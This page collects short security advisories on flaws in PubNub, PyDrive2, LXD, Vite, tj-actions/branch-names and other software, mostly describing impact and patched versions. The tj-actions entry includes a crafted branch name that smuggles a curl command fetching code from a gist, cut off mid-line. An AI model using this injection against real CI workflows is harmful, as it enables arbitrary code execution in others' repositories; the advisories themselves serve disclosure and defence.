#git

Versions of the package pubnub before 7.4.0; all versions of the package com.pubnub:pubnub; versions of the package pubnub before 6.19.0; all versions of the package github.com/pubnub/go; versions of the package github.com/pubnub/go/v7 before 7.2.0; versions of the package pubnub before 7.3.0; versions of the package pubnub/pubnub before 6.1.0; versions of the package pubnub before 5.3.0; versions of the package pubnub before 0.4.0; versions of the package pubnub/c-core before 4.5.0; versions of the package com.pubnub:pubnub-kotlin before 7.7.0; versions of the package pubnub/swift before 6.2.0; versions of the package pubnub before 5.2.0; versions of the package pubnub before 4.3.0 are vulnerable to Insufficient Entropy via the getKey function, due to inefficient implementation of the AES-256-CBC cryptographic algorithm. The provided encrypt function is less secure when hex encoding and trimming are applied, leaving half of the bits in the key always the same for every encoded message...

Improper input validation vulnerability in Samsung Open Source Escargot allows stack overflow and segmentation fault. This issue affects Escargot: from 3.0.0 through 4.0.0.

Brocade Fabric OS (FOS) hardware platforms running any version of Brocade Fabric OS software, which supports the license string format; contain cryptographic issues that could allow for the installation of forged or fraudulent license keys. This would allow attackers or a malicious party to forge a counterfeit license key that the Brocade Fabric OS platform would authenticate and activate as if it were a legitimate license key.

xinhu xinhuoa 2.2.1 contains a File upload vulnerability.

### Summary Unsafe YAML deserilization will result in arbitrary code execution. A maliciously crafted YAML file can cause arbitrary code execution if PyDrive2 is run in the same directory as it, or if it is loaded in via `LoadSettingsFile`. ### Details The loader being imported from the `yaml` library is `CLoader`: https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L5 This loader is then used to load a user supplied file: https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L108-L121 CLoader is considered unsafe. It will allow any Python code inside of it to be executed. This loading behaviour also happens automatically, the file only needs to be present for this vulnerability to occur. https://github.com/iterative/PyDrive2/blob/30c0f487c0666c0d1944ef774107359f39adc2fa/pydrive2/settings.py#L9 Reference: https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-...

### Impact The tokio-boring library in version 4.0.0 is affected by a memory leak issue that can lead to excessive resource consumption and potential DoS by resource exhaustion. The `set_ex_data` function used by the library did not deallocate memory used by pre-existing data in memory each time after completing a TLS connection causing the program to consume more resources with each new connection. ### Patches The issue is fixed in version 4.1.0 of tokio-boring. ### References [CVE-2023-6180 at cve.org](https://www.cve.org/CVERecord?id=CVE-2023-6180)

### Summary If a user has restricted access to a project that is configured with `restricted=true`, they can gain root access on the system by creating a disk device with `shift=true` and creating a setuid root executable. This is possible because the `shift` property is not restricted unless `restricted.devices.disk.paths` is set. ### Details The following patch shows the offending code with a possible fix: ```patch --- a/lxd/device/disk.go +++ b/lxd/device/disk.go @@ -429,17 +429,19 @@ func (d *disk) validateEnvironmentSourcePath() error { if instProject.Name != api.ProjectDefaultName { // If restricted disk paths are in force, then check the disk's source is allowed, and record the // allowed parent path for later user during device start up sequence. - if shared.IsTrue(instProject.Config["restricted"]) && instProject.Config["restricted.devices.disk.paths"] != "" { - allowed, restrictedParentSourcePath :=...

### Summary When Vite's HTML transformation is invoked manually via `server.transformIndexHtml`, the original request URL is passed in unmodified, and the `html` being transformed contains inline module scripts (`<script type="module">...</script>`), it is possible to inject arbitrary HTML into the transformed output by supplying a malicious URL query string to `server.transformIndexHtml`. ### Impact Only apps using `appType: 'custom'` and using the default Vite HTML middleware are affected. The HTML entry must also contain an inline script. The attack requires a user to click on a malicious URL while running the dev server. Restricted files aren't exposed to the attacker. ### Patches Fixed in [email protected], [email protected], [email protected] ### Details Suppose `index.html` contains an inline module script: ```html <script type="module"> // Inline script </script> ``` This script is transformed into a proxy script like ```html <script type="module" src="/index.html?html-proxy&index=0.js"></...

### Impact If functions `Encapsulate()`, `Decapsulate()` and `ECDH()` could be called by an attacker, he could recover any private key that he interacts with. ### Patches Patched in v2.0.8 ### Workarounds You could manually check public key by calling `IsOnCurve()` function from secp256k1 libraries. ### References https://github.com/ashutosh1206/Crypton/blob/master/Diffie-Hellman-Key-Exchange/Attack-Invalid-Curve-Point/README.md

### Summary The `tj-actions/branch-names` GitHub Actions references the `github.event.pull_request.head.ref` and `github.head_ref` context variables within a GitHub Actions `run` step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name. ### Details The vulnerable code is within the `action.yml` file the `run` step references the value directly, instead of a sanitized variable. ```yml runs: using: "composite" steps: - id: branch run: | # "Set branch names..." if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}") HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}") REF=$(printf "%q" "${{ github.ref }}") ``` An attacker can use a branch name to inject arbitrary code, for example: `Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/...